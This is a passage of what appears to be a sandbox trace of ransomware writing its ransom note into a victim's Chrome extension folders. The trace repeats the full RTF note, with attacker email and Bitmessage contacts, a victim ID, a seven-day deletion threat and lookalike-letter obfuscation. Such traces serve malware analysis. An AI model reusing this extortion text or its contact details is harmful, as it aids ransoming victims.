p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.110] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.111] CloseHandle (hObject=0x2ec) returned 1 [0291.111] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\#readme_eman#.rtf")) returned 0xffffffff [0291.111] GetLastError () returned 0x2 [0291.111] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.112] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.112] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.112] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 